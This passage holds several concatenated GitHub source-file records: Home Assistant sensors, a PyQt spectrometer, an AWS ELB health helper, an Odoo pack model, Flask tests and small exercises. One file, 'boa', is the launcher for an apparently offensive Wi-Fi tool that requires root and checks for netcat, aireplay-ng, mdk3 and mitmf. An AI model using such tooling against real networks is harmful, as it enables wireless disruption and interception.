device_class=SensorDeviceClass.,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.airflow_ventilation_rate * 100,\n suggested_display_precision=2,\n ),\n )\n if room.profile_name is not None:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_profile\",\n name=f\"{room.name} Profile\",\n icon=\"mdi:account-box\",\n room=room,\n value_fn=lambda x: x.profile_name,\n ),\n )\n return room_sensors\n\n\ndef generate_global_sensors_for_healthbox(\n coordinator: HealthboxDataUpdateCoordinator,\n) -> list[HealthboxGlobalSensorEntityDescription]:\n \"\"\"Generate global sensors.\"\"\"\n global_sensors: list[HealthboxGlobalSensorEntityDescription] = []\n global_sensors.append(\n HealthboxGlobalSensorEntityDescription(\n key=\"global_aqi\",\n name=\"Global Air Quality Index\",\n native_unit_of_measurement=None,\n icon=\"mdi:leaf\",\n device_class=SensorDeviceClass.AQI,\n state_class=SensorStateClass.MEASUREMENT,\n value_fn=lambda x: x.global_aqi,\n suggested_display_precision=2,\n )\n )\n global_sensors.append(\n HealthboxGlobalSensorEntityDescription(\n key=\"error_count\",\n name=\"Error Count\",\n native_unit_of_measurement=None,\n icon=\"mdi:alert-outline\",\n state_class=SensorStateClass.MEASUREMENT,\n value_fn=lambda x: x.error_count,\n suggested_display_precision=0,\n )\n )\n if coordinator.api.wifi.status:\n global_sensors.append(\n HealthboxGlobalSensorEntityDescription(\n key=\"wifi_status\",\n name=\"WiFi Status\",\n icon=\"mdi:wifi\",\n value_fn=lambda x: x.wifi.status,\n )\n )\n if coordinator.api.wifi.internet_connection is not 
None:\n global_sensors.append(\n HealthboxGlobalSensorEntityDescription(\n key=\"wifi_internet_connection\",\n name=\"WiFi Internet Connection\",\n native_unit_of_measurement=None,\n icon=\"mdi:web\",\n state_class=SensorStateClass.MEASUREMENT,\n value_fn=lambda x: x.wifi.internet_connection,\n )\n )\n if coordinator.api.wifi.ssid:\n global_sensors.append(\n HealthboxGlobalSensorEntityDescription(\n key=\"wifi_ssid\",\n name=\"WiFi SSID\",\n icon=\"mdi:wifi-settings\",\n value_fn=lambda x: x.wifi.ssid,\n )\n )\n return global_sensors\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Set up the sensor platform.\"\"\"\n coordinator: HealthboxDataUpdateCoordinator = hass.data[DOMAIN][\n config_entry.entry_id\n ]\n\n global_sensors = generate_global_sensors_for_healthbox(coordinator=coordinator)\n room_sensors = generate_room_sensors_for_healthbox(coordinator=coordinator)\n entities = []\n\n for description in global_sensors:\n entities.append(HealthboxGlobalSensor(coordinator, description))\n for description in room_sensors:\n entities.append(HealthboxRoomSensor(coordinator, description))\n\n async_add_entities(entities)\n\n\nclass HealthboxGlobalSensor(\n CoordinatorEntity[HealthboxDataUpdateCoordinator], SensorEntity\n):\n \"\"\"Representation of a Healthbox Room Sensor.\"\"\"\n\n entity_description: HealthboxGlobalSensorEntityDescription\n\n def __init__(\n self,\n coordinator: HealthboxDataUpdateCoordinator,\n description: HealthboxGlobalSensorEntityDescription,\n ) -> None:\n \"\"\"Initialize Sensor Domain.\"\"\"\n super().__init__(coordinator)\n\n self.entity_description = description\n self._attr_unique_id = f\"{coordinator.config_entry.entry_id}-{description.key}\"\n self._attr_name = f\"Healthbox {description.name}\"\n self._attr_device_info = DeviceInfo(\n name=f\"{coordinator.api.serial}\",\n identifiers={(DOMAIN, coordinator.config_entry.entry_id)},\n manufacturer=MANUFACTURER,\n model=coordinator.api.description,\n hw_version=coordinator.api.warranty_number,\n sw_version=coordinator.api.firmware_version,\n )\n\n @property\n def native_value(self) -> float | int | str | Decimal:\n \"\"\"Sensor native value.\"\"\"\n return self.entity_description.value_fn(self.coordinator.api)\n\n\nclass HealthboxRoomSensor(\n CoordinatorEntity[HealthboxDataUpdateCoordinator], SensorEntity\n):\n \"\"\"Representation of a Healthbox Room Sensor.\"\"\"\n\n entity_description: HealthboxRoomSensorEntityDescription\n\n def __init__(\n self,\n coordinator: HealthboxDataUpdateCoordinator,\n description: HealthboxRoomSensorEntityDescription,\n ) -> None:\n \"\"\"Initialize Sensor Domain.\"\"\"\n super().__init__(coordinator)\n\n self.entity_description = description\n self._attr_unique_id = f\"{coordinator.config_entry.entry_id}-{description.room.room_id}-{description.key}\"\n self._attr_name = f\"{description.name}\"\n self._attr_device_info = DeviceInfo(\n name=self.entity_description.room.name,\n identifiers={\n (\n DOMAIN,\n f\"{coordinator.config_entry.unique_id}_{self.entity_description.room.room_id}\",\n )\n },\n manufacturer=\"Renson\",\n model=\"Healthbox Room\",\n )\n\n @property\n def native_value(self) -> float | int | str | Decimal:\n \"\"\"Sensor native value.\"\"\"\n room_id: int = int(self.entity_description.room.room_id)\n\n matching_room = [\n room for room in self.coordinator.api.rooms if int(room.room_id) == room_id\n ]\n\n if len(matching_room) != 1:\n error_msg: str = f\"No matching room 
found for id {room_id}\"\n LOGGER.error(error_msg)\n else:\n matching_room = matching_room[0]\n return self.entity_description.value_fn(matching_room)\n\n return None\n","repo_name":"rmassch/healthbox-hacs","sub_path":"custom_components/healthbox/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":13397,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"43173884971","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtGui, uic, QtWidgets\nfrom PyQt5.QtGui import QImage, QPalette, QBrush, QPixmap, QIcon\nfrom PyQt5.QtCore import QSize, pyqtSlot, QTimer\nfrom PyQt5.uic import loadUi\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nimport math\nimport sympy\nfrom PIL import ImageTk, Image\nfrom scipy import signal\nimport matplotlib.pyplot as plt\nfrom sympy import *\nfrom os import remove\nfrom os import path\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\nimport os\nhavezero = 0\n\nFPER = \"spectra\"\nOUTDIR = \"output\"\ntry:\n os.stat( OUTDIR )\nexcept:\n os.mkdir( OUTDIR )\n\nint = 1\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n # call QWidget constructor\n\n super( MainWindow, self ).__init__()\n loadUi( 'app.ui', self )\n #figure\n self.spectrum = plt.figure()\n self.canvas = FigureCanvas( self.spectrum )\n #self.toolbar = NavigationToolbar( self.canvas, self )\n #self.layout.addWidget( self.toolbar )\n self.layout.addWidget( self.canvas )\n pixmap = QPixmap('visible-spectrum.png')\n self.image1.setPixmap(pixmap)\n #camera\n # create a timer\n self.timer=QTimer()\n # set timer timeout callback function\n self.timer.timeout.connect(self.viewCam)\n # set control_bt callback clicked function\n self.control_bt.clicked.connect(self.controlTimer)\n self.savebutton.clicked.connect( self.save)\n # view camera\n def viewCam(self):\n global frame\n global ret\n # read image in BGR format\n ret, image = self.cap.read()\n # convert image to RGB format\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # get image infos\n height, width, channel = image.shape\n step = channel * width\n # create QImage from image\n qImg = QImage(image.data, width, height, step, QImage.Format_RGB888)\n # show image in img_label\n self.video_label.setPixmap(QPixmap.fromImage(qImg))\n #code\n ret, frame = self.cap.read()\n key = cv2.waitKey( 1 ) & 0xFF\n self.spectrum.clear()\n self.spectrum.add_subplot( 2, 1, 1 )\n if (int):\n global sy, yy, yyc,bgfreqr,bgfreqg,bgfreqb,bgfreqt,freqr,freqg,freqb,freqt\n sy = frame.shape[0]\n yy = np.array( range( sy ) )\n yyc = .8611 * yy + 310.0492\n bgfreqr = yy * 0\n bgfreqg = yy * 0\n bgfreqb = yy * 0\n bgfreqt = yy * 0\n\n freqr = frame[:, :, 2].sum( axis=1 );\n freqr = freqr - min( freqr )\n freqg = frame[:, :, 1].sum( axis=1 );\n freqg = freqg - min( freqg )\n freqb = frame[:, :, 0].sum( axis=1 );\n freqb = freqb - min( freqb )\n freqt = freqr + freqg + freqb\n\n plt.clf()\n\n # plt.axis([0, yy[-1], 100, 4E5])\n plt.axis( [yyc[0], yyc[-1], 100, 4E5] )\n plt.yscale( 'log' )\n\n plt.plot( yyc, freqt, color='gray' )\n plt.plot( yyc, freqr, color='red' )\n plt.plot( yyc, freqg, color='green' )\n plt.plot( yyc, freqb, color='blue' )\n\n # plt.axvline(180,color='blue');\n # plt.axvline(260,color='green');\n # plt.axvline(360,color='red');\n plt.axvline( 390, color='purple' );\n plt.axvline( 470, color='blue' );\n plt.axvline( 
525, color='green' );\n plt.axvline( 590, color='yellow' );\n plt.axvline( 624, color='red' );\n plt.axvline( 625, color='orange' );\n plt.xlabel( \"Wavelength (nm)\" )\n plt.ylabel( \"Illuminant Power\" )\n #time.sleep(.2)\n self.canvas.draw()\n\n\n\n # start/stop timer\n def controlTimer(self):\n # if timer is stopped\n if not self.timer.isActive():\n # create video capture\n self.cap = cv2.VideoCapture(0)\n # start timer\n self.timer.start(20)\n # update control_bt text\n self.control_bt.setText(\"Stop\")\n\n\n # if timer is started\n else:\n self.video_label.setStyleSheet( \"background-color: rgb(0, 0, 0)\" )\n # stop timer\n self.timer.stop()\n # release video capture\n self.cap.release()\n # update control_bt text\n self.control_bt.setText(\"View\")\n self.video_label.setStyleSheet( \"background-color: rgb(0, 0, 0)\" )\n\n def save(self):\n\n FPER = self.labelrute.text()\n fname = OUTDIR + \"/\" + FPER + \"_\" + str( time.time() )\n plt.savefig( fname + \".png\", dpi=200 )\n cv2.imwrite( fname + \"_raw.bmp\", frame )\n dt = np.dtype(\n [('x', '|i'), ('l', 'd'), ('red', 'i'), ('green', 'i'), ('blue', 'i'), ('total', 'i'), ('bgred', 'i'),\n ('bggreen', 'i'), ('bgblue', 'i'), ('bgtotal', 'i')] )\n a = np.zeros( len( yy ), dt )\n a['x'] = yy;\n a['l'] = yyc;\n a['red'] = freqr;\n a['green'] = freqg;\n a['blue'] = freqb;\n a['total'] = freqt\n a['bgred'] = bgfreqr;\n a['bggreen'] = bgfreqg;\n a['bgblue'] = bgfreqb;\n a['bgtotal'] = bgfreqt\n np.savetxt( fname + '_data.txt', a, '%s', header=\"x l red green blue bgred bggreen bggblue\", comments='' )\n #print(\"saved \" + fname)\n time.sleep(.5)\n global name\n name = self.labelrute.text()\n noti = Notification( self )\n noti.show()\n\n\nclass Notification(QDialog):\n def __init__(self, parent=None):\n super( Notification, self ).__init__( parent )\n loadUi( 'notification.ui', self )\n self.buttonClose.clicked.connect( self.ok)\n self.labelName.setText(name)\n\n def ok(self):\n self.parent().show()\n self.close()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n GUI = MainWindow()\n GUI.show()\n sys.exit(app.exec_())\n\n\n\n\n\n","repo_name":"javimenba/spectrometer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29500843616","text":"import numpy as np\nfrom matplotlib import colors\n\nfrom tqdm import trange\n\ntry:\n from SI_Toolkit_ApplicationSpecificFiles.predictors_customization import STATE_VARIABLES, STATE_INDICES\nexcept ModuleNotFoundError:\n print('SI_Toolkit_ApplicationSpecificFiles not yet created')\n\nfrom SNN.predictor_autoregressive_SNN import predictor_autoregressive_SNN\n\n# This import mus go before pyplot so also before our scripts\nfrom matplotlib import use, get_backend\n# Use Agg if not in scientific mode of Pycharm\n\nif get_backend() != 'module://backend_interagg':\n use('Agg')\n\n\ncdict = {'red': ((0.0, 0.22, 0.0),\n (0.5, 1.0, 1.0),\n (1.0, 0.89, 1.0)),\n\n 'green': ((0.0, 0.49, 0.0),\n (0.5, 1.0, 1.0),\n (1.0, 0.12, 1.0)),\n\n 'blue': ((0.0, 0.72, 0.0),\n (0.5, 0.0, 0.0),\n (1.0, 0.11, 1.0))}\n\ncmap = colors.LinearSegmentedColormap('custom', cdict)\n\ndef get_data_for_gui_SNN(a, dataset, net_name, mode):\n states_0 = dataset[STATE_VARIABLES].to_numpy()[:-a.test_max_horizon, :]\n\n Q = dataset['Q'].to_numpy()\n Q_array = [Q[i:-a.test_max_horizon+i] for i in range(a.test_max_horizon)]\n Q_array = np.vstack(Q_array).transpose()\n\n if mode == 'batch':\n 
print('batch mode')\n # All at once\n predictor = predictor_autoregressive_SNN(horizon=a.test_max_horizon, batch_size=a.test_len, net_name=net_name)\n predictor.setup(initial_state=states_0, prediction_denorm=True)\n output_array = predictor.predict(Q_array)\n elif mode == 'sequential':\n print('sequential mode')\n predictor = predictor_autoregressive_SNN(horizon=a.test_max_horizon, batch_size=1, net_name=net_name)\n\n # Iteratively (to test internal state update)\n output_array = np.zeros([a.test_len, a.test_max_horizon + 1, len(STATE_VARIABLES) + 1], dtype=np.float32)\n for timestep in trange(a.test_len):\n Q_current_timestep = Q_array[np.newaxis, timestep, :]\n s_current_timestep = states_0[timestep, np.newaxis]\n\n predictor.setup(initial_state=s_current_timestep, prediction_denorm=True)\n #predictor.setup(initial_state=s_current_timestep, prediction_denorm=False)\n\n output_array[timestep,:,:] = predictor.predict(Q_current_timestep)\n predictor.update_internal_state(Q_current_timestep[0, 0])\n\n else:\n raise ValueError(\"Mode should be either 'batch' or 'sequential'\")\n\n output_array = output_array[..., [STATE_INDICES.get(key) for key in a.features]+[-1]]\n #print(output_array.shape) # shape = (161,41,7)\n #print(output_array)\n\n # time_axis is a time axis for ground truth\n return output_array\n","repo_name":"neuromorphs/LTC21-SNN","sub_path":"For_CartPoleSimulation/SNN/get_prediction_SNN_predictor.py","file_name":"get_prediction_SNN_predictor.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72633514346","text":"def f():\n print(\"这是一个函数\")\n\n\nf()\n\nmoney: float = 5000000\n\n\ndef mes(user: str, s: str):\n while True:\n msg = int(input(f\"\"\"\n{s * 10}主菜单{s * 10}\n {user},您好,欢迎使用本行ATM,请选择操作\n 查询余额[输入1]\n 存款[输入2]\n 取款[输入3]\n 退出[输入4]\n 请输入您的选择:\\t\n\"\"\"))\n if msg == 1:\n cha(user, s)\n elif msg == 2:\n sav_money = float(input(\"存款金额:\\t\"))\n cun(user, sav_money)\n elif msg == 3:\n qu_money = float(input(\"取款金额:\\t\"))\n qu(user, qu_money)\n elif msg == 4:\n break\n else:\n print(f\"输入非法,请重输\")\n\n\ndef cha(user: str, s: str):\n print(f\"{s * 10}查询结果{s * 10}\")\n yu(user, 1, 0)\n\n\ndef yu(user: str, typ: int, mone: float):\n global money # 引用全局变量\n if typ == 2:\n money += mone\n elif typ == 3:\n if mone <= money:\n money -= mone\n print(f\"\"\"{user},您好,您的余额剩余{round(money, 2)} \"\"\")\n\n\ndef cun(user: str, mone: float):\n # global money # 引用全局变量\n if mone >= 0.01:\n print(f\"{user},您好,您存款{mone}元成功\")\n yu(user, 2, mone)\n else:\n print(\"最低金额0.01元\")\n\n\ndef qu(user: str, mone: float):\n # global money # 引用全局变量\n if mone > money:\n print(f\"{user},您好,您取款{mone}元失败——余额不足\")\n else:\n print(f\"{user},您好,您取款{mone}元成功\")\n yu(user, 3, mone)\n\n\nmes(\"柳和\", \"***\")\n","repo_name":"FengMo1314/Python","sub_path":"itwanhe/day03_2022-11-8/函数.py","file_name":"函数.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25752683701","text":"with open(\"day15.txt\", \"r\") as f:\n\ti = [int(x) for x in f.readline().split(\",\")]\n\ndef find(num,init):\n\tm = {}\n\tn = 1\n\tl = None\n\tfor x in init:\n\t\tif l is not None:\n\t\t\tm[l] = n\n\t\tl = x\n\t\tn += 1\n\twhile n <= num:\n\t\tif l in m:\n\t\t\tnl = n-m[l]\n\t\telse:\n\t\t\tnl = 0\n\t\tm[l] = n\n\t\tl = nl\n\t\tn += 1\n\treturn l\n\npart1 = find(2020,i)\nprint(part1)\npart2 = 
find(30000000,i)\nprint(part2)","repo_name":"floh0/advent-of-code-2020","sub_path":"day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2883371536","text":"from re import T\nfrom typing import Dict\nimport boto3\nfrom botocore.config import Config\n\ndef getTargetHealth(answers) -> Dict:\n \"\"\"Retrieves all target status in this Target Group\"\"\"\n\n if not answers['standard_regions']:\n region = answers['other_regions']\n else: region = answers['standard_regions']\n \n config = Config(\n region_name = region,\n signature_version = 'v4',\n retries = {\n 'max_attempts': 10,\n 'mode': 'standard'\n }\n )\n\n tg_target_count = [] #for all tg ---> won't work if need to filter healthy targets\n if answers['elb_type'] == 'classic':\n \n client = boto3.client('elb',config=config)\n response = client.describe_instance_health(LoadBalancerName=answers['elb'])\n try: \n response[\"InstanceStates\"][0]\n except KeyError as error_no_targets:\n # reraise the error\n raise error_no_targets\n except IndexError as error_no_targets:\n # reraise the error\n print(\"\\033[91mError: There is no registered targets.\\033[0m\")\n raise error_no_targets \n\n return response,tg_target_count\n\n else: \n client = boto3.client('elbv2',config=config)\n for i in answers['tg']:\n if 'response' not in locals(): \n response = client.describe_target_health(TargetGroupArn=i['tg_arn'])\n tg_target_count.append(len(response['TargetHealthDescriptions']))\n #if there are multiple TGs or all TGs selected, keep appending the target health response\n else:\n temp = client.describe_target_health(TargetGroupArn=i['tg_arn'])\n tg_target_count.append(len(temp['TargetHealthDescriptions']))\n response['TargetHealthDescriptions'] = response['TargetHealthDescriptions']+temp['TargetHealthDescriptions']\n\n return response,tg_target_count\n \n\"\"\"\n{\n 'TargetHealthDescriptions': [\n {tg1-target1},{tg1-target2},\n {tg2-target1},\n {tg3-target1},{tg3-target2},{tg3-target3}\n ],\n 'ResponseMetadata': {...}\n}\n\"\"\"\n","repo_name":"aws/elb-doctor","sub_path":"elb_doctor/lib/tgs/getTargetHealth.py","file_name":"getTargetHealth.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"74269910186","text":"import skimage.io as io\nimport numpy as np\nfrom skimage import transform as xform\nfrom skimage import color\nfrom skimage import img_as_float, img_as_ubyte\nimport matplotlib.pyplot as plt\nimport glob\nimport os\nimport re\n\norig_dir = '/home/maryana/storage/Posdoc/PLI/2017/2372.10_Optic_Chiasm/blockface/orig'\nseg_dir = '/home/maryana/storage/Posdoc/PLI/2017/2372.10_Optic_Chiasm/blockface/seg'\nseg_dir2 = '/home/maryana/storage/Posdoc/PLI/2017/2372.10_Optic_Chiasm/blockface/seg_highres'\n\n\nfiles = glob.glob(os.path.join(orig_dir,'*.jpg'))\nnFiles = len(files)\nprint(nFiles)\n\nfor fPath in files:\n tind = [m.start() for m in re.finditer('/', fPath)]\n s = tind[-1]\n name = fPath[s + 1:]\n\n print(name)\n\n orig_name = os.path.join(orig_dir, name)\n name = os.path.splitext(name)[0] + '.png'\n seg_name = os.path.join(seg_dir, name)\n newName = os.path.join(seg_dir2, name)\n\n seg_img = io.imread(seg_name)\n mask = seg_img > 0\n\n orig_img = io.imread(orig_name)\n orig_img = img_as_ubyte(color.rgb2gray(orig_img))\n mask2 = xform.resize(mask, orig_img.shape)\n\n orig_img[mask2 <= 0] = 0\n\n io.imsave(newName, 
orig_img)","repo_name":"grinberglab/high-res-3D-tau","sub_path":"PyRegistration/Segmentation/chiasm_blockseg_highres.py","file_name":"chiasm_blockseg_highres.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"18302472985","text":"def swap_case(s):\n new_s = \"\"\n for el in s:\n if el.islower():\n new_s += el.upper()\n elif el.isupper():\n new_s += el.lower()\n else:\n new_s += el\n return new_s\n\nif __name__ == '__main__':\n s = input()\n result = swap_case(s)\n print(result)\n","repo_name":"jcreighton669/HackerRank-Daily-Challenges","sub_path":"swap_case.py","file_name":"swap_case.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28115264967","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass ProductPack(models.Model):\n _inherit = 'product.template'\n\n def default_pack_location(self):\n company_user = self.env.company\n warehouse = self.env['stock.warehouse'].search([('company_id', '=', company_user.id)], limit = 1)\n if warehouse:\n return warehouse.lot_stock_id.id\n\n is_pack = fields.Boolean('Is a Pack')\n pack_price = fields.Integer(string = \"Pack Price\", compute = 'set_pack_price', store = True)\n pack_products_ids = fields.One2many('pack.products', 'product_tmpl_id', string = 'Pack Products')\n pack_quantity = fields.Integer('Pack Quantity')\n pack_location_id = fields.Many2one('stock.location',\n domain = [('usage', 'in', ['internal', 'transit'])],\n default = default_pack_location)\n\n @api.depends('pack_products_ids', 'pack_products_ids.price')\n def set_pack_price(self):\n price = 0\n for record in self:\n for line in record.pack_products_ids:\n price = price + line.price\n record.pack_price = price\n\n @api.model\n def create(self, values):\n if values.get('is_pack', False):\n if not values.get('pack_products_ids', []):\n raise UserError(_(\n 'You need to add atleast one product in the Pack...!'))\n if values.get('type', False) == 'service':\n raise UserError(_('You cannot define a pack product as a service..!'))\n return super(ProductPack, self).create(values)\n\n def write(self, values):\n super(ProductPack, self).write(values)\n if self.is_pack:\n if not self.pack_products_ids:\n raise UserError(_(\n 'You need to add atleast one product in the Pack...!'))\n if self.type == 'service':\n raise UserError(_('You cannot define a pack product as a service..!'))\n\n def update_price_product(self):\n self.lst_price = self.pack_price\n\n def get_quantity(self):\n total_quantity = 1\n flag = 1\n while flag:\n for line in self.pack_products_ids:\n if line.qty_available >= line.quantity * total_quantity:\n continue\n else:\n if line.product_id.type != 'product':\n continue\n flag = 0\n break\n if flag:\n total_quantity = total_quantity + 1\n self.pack_quantity = total_quantity - 1\n\n def update_quantity(self):\n company_user = self.env.company\n product_id = len(self.product_variant_ids) == 1 and self.product_variant_id.id\n location_id = self.pack_location_id.id\n if not location_id:\n warehouse = self.env['stock.warehouse'].search([('company_id', '=', company_user.id)], limit = 1)\n location_id = warehouse.lot_stock_id.id\n if not location_id:\n raise UserError(_(\n 'You need to select the location to update the pack quantity...!'))\n self.env['stock.quant'].with_context(inventory_mode = True).sudo().create({\n 'product_id': 
product_id,\n 'location_id': location_id,\n 'inventory_quantity': self.pack_quantity,\n })\n\n @api.onchange('pack_location_id')\n def change_quantity_based_on_location(self):\n for line in self.pack_products_ids:\n stock_quant = self.env['stock.quant'].search(\n [('product_id', '=', line.product_id.id), ('location_id', '=', self.pack_location_id.id)])\n if stock_quant:\n line.total_available_quantity = stock_quant.quantity\n\n else:\n line.total_available_quantity = stock_quant.quantity","repo_name":"techkitebusiness/CybroAddons","sub_path":"product_combo_pack/models/product_form.py","file_name":"product_form.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13027173327","text":"class Solution:\n # @param matrix, a list of lists of integers\n # @param target, an integer\n # @return a boolean\n def searchMatrix(self, matrix, target):\n if len(matrix) == 0: return False\n n, m = len(matrix), len(matrix[0])\n x = 0\n y = m - 1\n while x < n and y >= 0:\n if matrix[x][y] == target: return True\n if matrix[x][y] > target: y -= 1\n else: x += 1\n return False\n","repo_name":"philokey/Algorithm-Problems","sub_path":"Leetcode/Search a 2D Matrix.py","file_name":"Search a 2D Matrix.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22348138905","text":"import sys\nimport os\nfrom time import sleep\nfrom .tools.util import help, bcolors, version, clear\nfrom .tools.process import Process\nfrom .tools.runner import run\n\n\ndef dependency_check():\n ''' Check that required programs are installed '''\n required_apps = ['airmon-ng', 'iwconfig', 'ifconfig', 'aircrack-ng',\n 'aireplay-ng', 'airodump-ng', 'ship', 'netcat', 'nc', 'mdk3', 'mitmf']\n missing_required = False\n\n for app in required_apps:\n if not Process.exists(app):\n missing_required = True\n print(bcolors.FAIL + '{!} {R}error: required app {O}%s{R} was not found' % app + bcolors.ENDC)\n\n if missing_required:\n print(bcolors.FAIL +\n '{!} {R}required app(s) were not found, exiting.{W}' + bcolors.ENDC)\n sys.exit(-1)\n\ndef main():\n if (os.popen('whoami').read() == 'root\\n'):\n # Setup args\n args = sys.argv[1:]\n\n # Handle Arguments\n for arg in args:\n if (arg == \"--help\" or arg == \"-h\"):\n clear()\n intro()\n help()\n sys.exit(0)\n elif (arg == \"--version\" or arg == \"-v\"):\n version()\n sys.exit(0)\n # print('passed argument :: {}'.format(arg))\n\n try:\n # Run into loop\n dependency_check()\n clear()\n intro()\n sleep(3)\n run()\n sys.stdout.write('\\b\\b\\r') # Current solution\n sys.stdout.flush()\n except KeyboardInterrupt:\n sys.exit(0)\n else:\n print(bcolors.FAIL + \"Please run Boa as root.\" + bcolors.ENDC)\n sys.exit(0)\n\n\ndef intro():\n print(bcolors.OKGREEN + '888\\n888\\n888\\n88888b. .d88b. 8888b.\\n888 \"88bd88\"\"88b \"88b\\n888 888888 888.d888888\\n888 d88PY88..88P888 888\\n88888P\" \"Y88P\" \"Y888888\\n ' + bcolors.ENDC)\n print(bcolors.WARNING + \"\\n ,,'6\\'\\'-,.\\n <====,.;;--.\\n _`---===. 
\\\"\\\"\\\"==__\\n //\\\"\\\"@@-\\===\\@@@@ \\\"\\\"\\\\\\\\\\n |( @@@ |===| @@@ ||\\n \\\\ @@ |===| @@ //\\n \\\\ @@ |===|@@@ //\\n \\\\ |===| //\\n___________\\\\|===| //_____,----\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"-----,_\\n \\\"\\\"\\\"\\\"---,__`\\===`/ _________,---------,____ `,\\n |==|| `\\ \\n |==| | ) |\\n |==| | _____ ______,--\\' \\'\\n |=| `----\\\"\\\\\"\" `\\\"\\\"\\\"\\\"\\\"\\\"\\\"\\\"'_,-'\\n `=\\ __,---\\\"\\\"\\\"-------------\\\"\\\"\\\"\\'\\'\\n \\\"\\\"\\\"\\\"\\n\")\n print('\\n' + bcolors.OKGREEN + 'Developed by ajmwagar' + bcolors.ENDC)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ajmwagar/boa","sub_path":"boa/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71414484266","text":"from flask_testing import TestCase\nimport json\nfrom tests import app\nfrom arcdesigns.app import create_app\nfrom arcdesigns.config import TestingConfig\nfrom arcdesigns.database import db as _db\nimport os\n\n\n\nclass BaseTestCase(TestCase):\n\n \"\"\" base test class for testing endpoints \"\"\"\n\n\n def create_app(self):\n return create_app(TestingConfig)\n\n def setUp(self):\n self.app = app\n self.client = self.app.test_client()\n _db.create_all()\n self.test_user = {\"username\":\"david\",\"email\":\"david@gmail.com\",\\\n \"password\":\"wrej@jafcd\"}\n self.post = {\"body\": \"this is a 3 bedroom house buy it\",\n \"cost\": 500,\n \"description\": \"3 bedroom house\",\n \"image\": \"img/design.jpeg\",\n \"title\": \"PL123\"\n }\n \n \n def tearDown(self):\n _db.session.remove()\n _db.drop_all()\n\n \n def register_user(self):\n response = self.client.post('/api/auth/signup',\\\n json = {'user': self.test_user }, content_type='application/json' )\n return response\n\n\n def login_user(self):\n return self.client.post('/api/auth/login',\\\n json = {\"user\": self.test_user }, content_type='application/json')\n\n\n def generate_token(self):\n self.register_user()\n response = self.login_user()\n data = json.loads(response.data.decode())\n return 'Bearer ' + data['user']['token']\n\n\n def make_post(self):\n response = self.client.post( '/api/designs',content_type='application/json',\\\n headers={'Authorization': self.generate_token()}, json = {\"post\": self.post})\n return response\n\n def get_all_posts(self):\n response = self.client.get('/api/designs', content_type='application/json',\\\n headers={'Authorization': self.generate_token()})\n return response\n\n def add_to_cart(self):\n self.make_post()\n response = self.client.post('/api/designs/cart/1', content_type='application/json',\\\n headers={'Authorization': self.generate_token()})\n return response\n\n\n \n \n ","repo_name":"kayongopique/flask-arc-designs","sub_path":"tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73869755626","text":"import os\r\nimport sys\r\nimport numpy as np\r\nfrom mpi4py import MPI\r\n\r\ncomm = MPI.COMM_WORLD\r\nrank = comm.Get_rank()\r\n\r\nmessage_count = 0\r\ndebug_arg = \"\"\r\n\r\nif len(sys.argv) > 1:\r\n debug_arg = sys.argv[1]\r\n\r\ndebug = True if debug_arg == \"debug\" else False\r\n\r\n# Clear file\r\nif debug:\r\n f = open(\"debug\" + str(rank) + \".txt\", \"w\").close()\r\n\r\n# Each array is the rank of the process that will filter the image.\r\n# We will filter 4 sub arrays 
